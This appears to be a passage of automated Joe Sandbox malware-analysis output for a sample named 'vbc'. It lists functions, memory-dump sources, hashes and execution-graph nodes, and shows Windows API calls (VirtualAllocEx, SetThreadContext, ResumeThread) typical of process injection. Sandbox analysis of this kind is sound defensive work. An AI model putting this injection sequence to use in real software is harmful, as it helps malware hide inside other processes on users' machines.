                                                  • SetThreadContext.KERNELBASE(?,00000000), ref: 0709F3CE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.416944133.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7090000_vbc.jbxd
                                                  Similarity
                                                  • API ID: ContextThread
                                                  • String ID:
                                                  • API String ID: 1591575202-0
                                                  • Opcode ID: 8a18a46186872e4f4958c47f909d29fa4c8ca1b84726bc2c6f0ed80cea4303e4
                                                  • Instruction ID: b7c1acf98191b283c60fd3fefd4e9c6e25bb71f00690071d33f341e162c3b6e6
                                                  • Opcode Fuzzy Hash: 8a18a46186872e4f4958c47f909d29fa4c8ca1b84726bc2c6f0ed80cea4303e4
                                                  • Instruction Fuzzy Hash: 91211AB19002099FCB50DFAAC4857EEBBF4EF48324F54842DD459A7740DB78A949CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0265C40A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 178 265c40a-265c4a4 DuplicateHandle 179 265c4a6-265c4ac 178->179 180 265c4ad-265c4ca 178->180 179->180
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0265C3D6,?,?,?,?,?), ref: 0265C497
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.406513850.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2650000_vbc.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 4584c23d60358f60c6ca1b2de980498dbef24cba462e09e488f20e3c4c64dacd
                                                  • Instruction ID: f4a1ed834dfce8a19263af0d8b7cb77b826805ccf54ca977aaaaa83e604b7daf
                                                  • Opcode Fuzzy Hash: 4584c23d60358f60c6ca1b2de980498dbef24cba462e09e488f20e3c4c64dacd
                                                  • Instruction Fuzzy Hash: 7321F3B5901219DFDB00CFA9D584AEEBBF5FB48324F14841AE918A3710C778A995CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02659468 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 183 2659468-265a3b0 185 265a3b2-265a3b5 183->185 186 265a3b8-265a3e7 LoadLibraryExW 183->186 185->186 187 265a3f0-265a40d 186->187 188 265a3e9-265a3ef 186->188 188->187
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0265A1C9,00000800,00000000,00000000), ref: 0265A3DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.406513850.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2650000_vbc.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 27461435cdbdd79a7c1518712928aa2f3815c8e08d3b95d413fcd8e2bf7e96cb
                                                  • Instruction ID: 992e73bfd6357f88785c14fdb92f1ea184bf63c621a8c7e71dc3f0c463d25e31
                                                  • Opcode Fuzzy Hash: 27461435cdbdd79a7c1518712928aa2f3815c8e08d3b95d413fcd8e2bf7e96cb
                                                  • Instruction Fuzzy Hash: 4211F4B69002199FDB10CF9AD544BDEBBF4AB49228F00851ED815A7700C774A945CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0709F4E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 198 709f4e8-709f563 VirtualAllocEx 201 709f56c-709f591 198->201 202 709f565-709f56b 198->202 202->201
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0709F556
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.416944133.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7090000_vbc.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 3086ebc69a6b54e1b6c2097b1c7109e2c33650f143ec4ae203b172891335f007
                                                  • Instruction ID: 5d835e586b63203203f0746227fdd587c7ddda92c8ce29660a62500067ac24d8
                                                  • Opcode Fuzzy Hash: 3086ebc69a6b54e1b6c2097b1c7109e2c33650f143ec4ae203b172891335f007
                                                  • Instruction Fuzzy Hash: B41137B19002499FCF10DFA9C8457DFBBF5EF48324F148819E529A7650CB79A958CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0265A368 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 191 265a368-265a3b0 192 265a3b2-265a3b5 191->192 193 265a3b8-265a3e7 LoadLibraryExW 191->193 192->193 194 265a3f0-265a40d 193->194 195 265a3e9-265a3ef 193->195 195->194
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0265A1C9,00000800,00000000,00000000), ref: 0265A3DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.406513850.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2650000_vbc.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: e34fc4c4972635f0e992829030dd2e4ce42c8dcf3e47dff7b962490e4794187e
                                                  • Instruction ID: 02af2710af748d5310660a2abc04bb284d884c11c6d539f453aa2afca11f3eda
                                                  • Opcode Fuzzy Hash: e34fc4c4972635f0e992829030dd2e4ce42c8dcf3e47dff7b962490e4794187e
                                                  • Instruction Fuzzy Hash: 771103B69002498FCB10CFA9D544BDEFBF4AB88324F14852ED859B7710C778A949CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0709F270 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 206 709f270-709f2df ResumeThread 209 709f2e8-709f30d 206->209 210 709f2e1-709f2e7 206->210 210->209
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.416944133.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7090000_vbc.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 4cf2c7a8d9071c7153d5d7e7f651917ec3b6323cce20ba995e7e9a587a393162
                                                  • Instruction ID: 6929a3e4acc1ab165effcf65f95a4927d9be26efad5789f1c7825d96d491d3be
                                                  • Opcode Fuzzy Hash: 4cf2c7a8d9071c7153d5d7e7f651917ec3b6323cce20ba995e7e9a587a393162
                                                  • Instruction Fuzzy Hash: 4A113AB19002498FCB10DFAAD4457DFFBF4AB48328F148429D419A7740CB78A948CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0265A0E8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 214 265a0e8-265a128 215 265a130-265a15b GetModuleHandleW 214->215 216 265a12a-265a12d 214->216 217 265a164-265a178 215->217 218 265a15d-265a163 215->218 216->215 218->217
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0265A14E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.406513850.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2650000_vbc.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: f7a63572d3cbc3ee708016acf0af8b6139a4a55b9e51de34f50f2a59286289ba
                                                  • Instruction ID: f8fb20bebb8126bcf18bf9c189bb5eda1a9017efbb3b2183d785d1842d6335f6
                                                  • Opcode Fuzzy Hash: f7a63572d3cbc3ee708016acf0af8b6139a4a55b9e51de34f50f2a59286289ba
                                                  • Instruction Fuzzy Hash: 9B1113B1C002598FCB20CF9AC944BDFFBF4AB48224F10851AD869A7700C378A545CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0537EDC9 Relevance: .2, Instructions: 189COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.412750472.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5370000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 20bb16f0b124468528b22e16021955dd842fb3e3b6822cd02bf1c46a761081d3
                                                  • Instruction ID: df75cbe20e77a67002946c06763039c110f26a1371cf610a8a19d45266059eac
                                                  • Opcode Fuzzy Hash: 20bb16f0b124468528b22e16021955dd842fb3e3b6822cd02bf1c46a761081d3
                                                  • Instruction Fuzzy Hash: 3771EE34E05298DFDB24CBA0D9107BEBBB7BF45340F04C16AE2659B781D7789A42CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0537F852 Relevance: .1, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.412750472.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5370000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73e8b913adfb9bd9787afe2168d0829a6927500b6af0ba3c54168b9d12a9c61b
                                                  • Instruction ID: 910567481236448a6850c21a343bdea9d506779f434e58cda18bfe99e4aa3ba1
                                                  • Opcode Fuzzy Hash: 73e8b913adfb9bd9787afe2168d0829a6927500b6af0ba3c54168b9d12a9c61b
                                                  • Instruction Fuzzy Hash: 3E412671E0829DDBD722CB68DC003BAB7B6BF41251F0482A7E166C7681E73CD9858791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0537E1D8 Relevance: .1, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.412750472.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5370000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f173645f8a1a5ae0c00637502bd01f86822cb5cfc1bd9e220c8f75b6c112c838
                                                  • Instruction ID: 9ee8455cc0ec0769e30da9a3bbc92a25e62d30a0420cee1554a62a8350a6efdc
                                                  • Opcode Fuzzy Hash: f173645f8a1a5ae0c00637502bd01f86822cb5cfc1bd9e220c8f75b6c112c838
                                                  • Instruction Fuzzy Hash: 5231E470E0420DDFDB60DFB9D885ABE76AEFB44301F5440AAE016DB290D7789840D761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0537DF40 Relevance: .1, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.412750472.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5370000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08f62f172112ed83eb3a4170e87c498c335703ff60c9c311275c3c70150c69c1
                                                  • Instruction ID: edbd19653874652a3905948e214e05ee0456af7bdccff32754f67346f7b3a2ef
                                                  • Opcode Fuzzy Hash: 08f62f172112ed83eb3a4170e87c498c335703ff60c9c311275c3c70150c69c1
                                                  • Instruction Fuzzy Hash: DE319E70E0465DCFCB30DB76C4406BFBBBAAF06200F04896AD07697A81C3BD9955CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0537E0B0 Relevance: .1, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.412750472.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5370000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d06204c4f0195ae14488c97d7a23bf83b45fdc55c777a7f4f7aada2e9beb04f
                                                  • Instruction ID: 48e401c33e769c8437dc30580b6c948381afc3d1827dd07c4b4cbb87f8a1b571
                                                  • Opcode Fuzzy Hash: 9d06204c4f0195ae14488c97d7a23bf83b45fdc55c777a7f4f7aada2e9beb04f
                                                  • Instruction Fuzzy Hash: 4C218131E0415D8BD724CFBADC45BBABBBEFB84210F0881A2E626DB690D778D9019750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0537F708 Relevance: .1, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.412750472.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5370000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 36360b99da21a7748ef3580f3bc66f00658b1d87c45344fd13994a8d18937aaa
                                                  • Instruction ID: 591111f93a7b926e10af1e816c2131849791219a5ffc5808f0102bfeff358146
                                                  • Opcode Fuzzy Hash: 36360b99da21a7748ef3580f3bc66f00658b1d87c45344fd13994a8d18937aaa
                                                  • Instruction Fuzzy Hash: 5B21D760E0818DC7D720CB69DD413BBB7BAFB842E0F0481B7A555C6780D73CD985C291
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0537F6F8 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.412750472.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5370000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40190ad634c82e7b5c59598727c1b200666453b01cf6cb6325370ca3b9709ea6
                                                  • Instruction ID: c1772143956392206eb50121d3fd4027ab4fc58345c4166a3cf590aebce652e6
                                                  • Opcode Fuzzy Hash: 40190ad634c82e7b5c59598727c1b200666453b01cf6cb6325370ca3b9709ea6
                                                  • Instruction Fuzzy Hash: FB21F060E0818DC7D720CBA9DD403BBBABAFB853D0F1481B7A551C6784E63CC9868291
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0537FE68 Relevance: .1, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.412750472.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5370000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 17eb001e20fb9d234263d5d81d1d0462ad77cc20ff6bfce518cd19e95b0a58c9
                                                  • Instruction ID: fd71fdbaf8983731a96f3a6883c1e6e88346b5ca64c81a45cb7de62568434751
                                                  • Opcode Fuzzy Hash: 17eb001e20fb9d234263d5d81d1d0462ad77cc20ff6bfce518cd19e95b0a58c9
                                                  • Instruction Fuzzy Hash: 4311D630B513499FDB349B1A9815B3A7697BBC6B00F518066E5128FA91CE78D8828761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0537FE58 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.412750472.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5370000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d2151c30dc3b20177df57b20400e6bc9348e8bd33f898fee0ef2a52ddaf6696a
                                                  • Instruction ID: 17275bbf2136f128b4750d06afe3b4185c230c82cae4d9b48638075f96030910
                                                  • Opcode Fuzzy Hash: d2151c30dc3b20177df57b20400e6bc9348e8bd33f898fee0ef2a52ddaf6696a
                                                  • Instruction Fuzzy Hash: D0112630B45349DFD734CA159805B39B763BF86701F1581A6E1228F9E2CA78D882CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 07096343 Relevance: 1.6, Strings: 1, Instructions: 330COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.416944133.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7090000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: UUUU
                                                  • API String ID: 0-1798160573
                                                  • Opcode ID: 10f569462978277a9487abf83d30f8460265365fcb69287c4921426b6a6a7517
                                                  • Instruction ID: 0535fd6f340a32eb704b859f16caf00241efc9ae5fee4f33b8178ea05588011f
                                                  • Opcode Fuzzy Hash: 10f569462978277a9487abf83d30f8460265365fcb69287c4921426b6a6a7517
                                                  • Instruction Fuzzy Hash: D0F1A2B0E102298FDB64CF69C980B9DF7B2AF89304F1481A9D459A7316D731AE86CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 07096FC8 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.416944133.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7090000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: g
                                                  • API String ID: 0-30677878
                                                  • Opcode ID: 5912d4b2b6e70a7ac6ea0677fb08b56d50c05787c73cdab3d2879db6be62d499
                                                  • Instruction ID: 3ebdf31de2313f24d363cb2ab54b84f46b4e26f884e043deefc460aff2d75a88
                                                  • Opcode Fuzzy Hash: 5912d4b2b6e70a7ac6ea0677fb08b56d50c05787c73cdab3d2879db6be62d499
                                                  • Instruction Fuzzy Hash: 064152B1E056588BEB5CCF6BCD4069EFAF3AFC9204F14C1BA840CAB264DB310995CE11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 053741D0 Relevance: .5, Instructions: 475COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.412750472.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5370000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d69c31ebd4a37ee624c485775ced2d7814793adcb85c52293be0db7b7915be8
                                                  • Instruction ID: e8cc46b3ae7e01760cdbf0d096e694eb22ec0d7c03d67b32fa1d1d36bfb8eb22
                                                  • Opcode Fuzzy Hash: 8d69c31ebd4a37ee624c485775ced2d7814793adcb85c52293be0db7b7915be8
                                                  • Instruction Fuzzy Hash: B0222635A10218CFCF24DF68D884AADB7B2FF85314F1585A9E809AB225DB74AD85CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0265F0D0 Relevance: .3, Instructions: 315COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.406513850.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2650000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92f43488247c74da3ee475d87967bfb3909ad114884eeaa360ec65aecd3a858a
                                                  • Instruction ID: 268455d1ccd2347bf3dc64edba31d43b9c8966aa0c0492c336a543255ca15303
                                                  • Opcode Fuzzy Hash: 92f43488247c74da3ee475d87967bfb3909ad114884eeaa360ec65aecd3a858a
                                                  • Instruction Fuzzy Hash: 1812C6F1C917468BE318CF65F99818D3BA1B740328BD06AA9D9631BAD0D7B411EECF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0265CD04 Relevance: .3, Instructions: 265COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.406513850.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2650000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b07930fef6d3aee379a06c98b9d08e9f73d96290ee5ae4818c328f43ed908707
                                                  • Instruction ID: 3f6a05e5140272ef3a9beeb75243b5ae9e941a04c928c6586e855459405c799c
                                                  • Opcode Fuzzy Hash: b07930fef6d3aee379a06c98b9d08e9f73d96290ee5ae4818c328f43ed908707
                                                  • Instruction Fuzzy Hash: C5A16D32E0022ACFCF05DFA5C9445DEBBB2FF85304F15856AE905AB260EB35A955CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070955B8 Relevance: .2, Instructions: 170COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.416944133.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7090000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de5e2ec9bbd260bae24fad92b8a92aef0d8a235a2c509eea12e9d135b2029fc5
                                                  • Instruction ID: 2b668014fe4269f2db0fd4def36eed7e860a5809803b5e312b15c0dc5fd2ac15
                                                  • Opcode Fuzzy Hash: de5e2ec9bbd260bae24fad92b8a92aef0d8a235a2c509eea12e9d135b2029fc5
                                                  • Instruction Fuzzy Hash: 82615070E116048FDB45EF66E9406D9BBF3AF84304F04C47AE509AB368EB35594ACF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070955C8 Relevance: .2, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.416944133.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7090000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5932cec82dea1176e80b0a8d7e95a8f52325c00220f61c45e9ee12b54ae80b76
                                                  • Instruction ID: 548fe2d1cd99afdbbb9ed0dc45a5d0c0783cdac682b5e88af8c5ea118683371e
                                                  • Opcode Fuzzy Hash: 5932cec82dea1176e80b0a8d7e95a8f52325c00220f61c45e9ee12b54ae80b76
                                                  • Instruction Fuzzy Hash: B5615070E116048FDB48EF66E9406D9BBF3AF84304F08C47AD509AB368DB35594ACF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:0.5%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:61.5%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:87
                                                  execution_graph 17662 1685ba5 17663 1685bb4 _vswprintf_s 17662->17663 17669 1685c10 17663->17669 17670 1685c2a _vswprintf_s 17663->17670 17673 1684c56 17663->17673 17683 160d130 17669->17683 17670->17669 17671 16860cf GetPEB 17670->17671 17672 15f9710 LdrInitializeThunk 17670->17672 17677 15f6de6 17670->17677 17671->17670 17672->17670 17674 1684c62 _vswprintf_s 17673->17674 17675 160d130 _vswprintf_s 12 API calls 17674->17675 17676 1684caa 17675->17676 17676->17670 17678 15f6e03 17677->17678 17682 15f6e73 17677->17682 17680 15f6e53 17678->17680 17678->17682 17686 15f6ebe 17678->17686 17680->17682 17694 15e6a60 17680->17694 17682->17670 17684 15fb640 _vswprintf_s 12 API calls 17683->17684 17685 160d13a 17684->17685 17685->17685 17699 15ceef0 17686->17699 17689 15f6eeb 17691 15f6f0d 17689->17691 17710 15f7742 17689->17710 17716 16684e0 17689->17716 17690 15f6f48 17690->17678 17704 15ceb70 17691->17704 17695 1628025 17694->17695 17696 15e6a8d _vswprintf_s 17694->17696 17696->17695 17697 15fb640 _vswprintf_s 12 API calls 17696->17697 17698 15e6b66 17697->17698 17698->17682 17700 15cef21 17699->17700 17701 15cef0c 17699->17701 17702 15cef29 17700->17702 17722 15cef40 17700->17722 17701->17689 17702->17689 17705 15ceb9e 17704->17705 17706 15ceb81 17704->17706 17705->17690 17706->17705 17708 15cebac 17706->17708 17986 164ff10 17706->17986 17708->17705 17980 15b4dc0 17708->17980 17711 15f7827 17710->17711 17714 15f7768 _vswprintf_s 17710->17714 17711->17689 17713 15ceef0 27 API calls 17713->17714 17714->17711 17714->17713 17715 15ceb70 33 API calls 17714->17715 18053 15f9660 LdrInitializeThunk 17714->18053 17715->17714 17717 1668511 17716->17717 17718 15ceb70 33 API calls 17717->17718 17719 1668556 17718->17719 17720 15ceef0 27 API calls 17719->17720 17721 16685f1 17720->17721 17721->17689 17723 15cf0bd 17722->17723 17726 15cef5d 17722->17726 17723->17726 17760 15b9080 17723->17760 17727 15cf071 17726->17727 17729 15cf042 17726->17729 17730 15b2d8a 17726->17730 17727->17701 17728 15cf053 GetPEB 17728->17727 17729->17727 17729->17728 17731 15b2df1 _vswprintf_s 17730->17731 17732 15b2db8 17730->17732 17733 160f9d0 GetPEB 17731->17733 17737 160f9e3 GetPEB 17731->17737 17741 15b2e5a 17731->17741 17764 15d7d50 GetPEB 17731->17764 17777 164fe87 17731->17777 17784 164fdda 17731->17784 17790 164ffb9 17731->17790 17798 1645720 17731->17798 17732->17731 17734 15b2de7 17732->17734 17766 15b2e9f 17732->17766 17733->17737 17734->17731 17770 15e1624 17734->17770 17737->17731 17742 15b2e61 17741->17742 17748 15b2e99 _vswprintf_s 17741->17748 17743 15b2e69 17742->17743 17744 15d7d50 GetPEB 17742->17744 17743->17726 17746 160fa76 17744->17746 17749 160fa8a 17746->17749 17750 160fa7a GetPEB 17746->17750 17747 15b2ece 17747->17726 17748->17747 17813 15f95d0 LdrInitializeThunk 17748->17813 17749->17743 17753 160fa97 GetPEB 17749->17753 17750->17749 17753->17743 17754 160faaa 17753->17754 17755 15d7d50 GetPEB 17754->17755 17756 160faaf 17755->17756 17757 160fac3 17756->17757 17758 160fab3 GetPEB 17756->17758 17757->17743 17801 1637016 17757->17801 17758->17757 17761 15b9098 17760->17761 17762 15b909e GetPEB 17760->17762 17761->17762 17763 15b90aa 17762->17763 17763->17726 17765 15d7d5d 17764->17765 17765->17731 17768 15b2ebb _vswprintf_s 17766->17768 17767 15b2ece 17767->17734 17768->17767 17814 15f95d0 LdrInitializeThunk 17768->17814 17815 15e16e0 17770->17815 17772 15e1630 17776 15e1691 17772->17776 17819 15e16c7 17772->17819 17775 15e165a 17775->17776 17826 15ea185 17775->17826 17776->17731 17778 15d7d50 GetPEB 17777->17778 17779 164fec1 17778->17779 17780 164fec5 GetPEB 17779->17780 17781 164fed5 _vswprintf_s 17779->17781 17780->17781 17852 15fb640 17781->17852 17783 164fef8 17783->17731 17785 164fdff __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17784->17785 17786 1645720 _vswprintf_s 12 API calls 17785->17786 17787 164fe0f 17786->17787 17788 1645720 _vswprintf_s 12 API calls 17787->17788 17789 164fe39 17788->17789 17789->17731 17791 164ffc8 _vswprintf_s 17790->17791 17929 15ee730 17791->17929 17940 15bb171 17798->17940 17802 1637052 17801->17802 17803 1637073 GetPEB 17802->17803 17809 1637084 17802->17809 17803->17809 17804 1637101 _vswprintf_s 17805 1637136 17804->17805 17806 1637125 GetPEB 17804->17806 17807 15fb640 _vswprintf_s 12 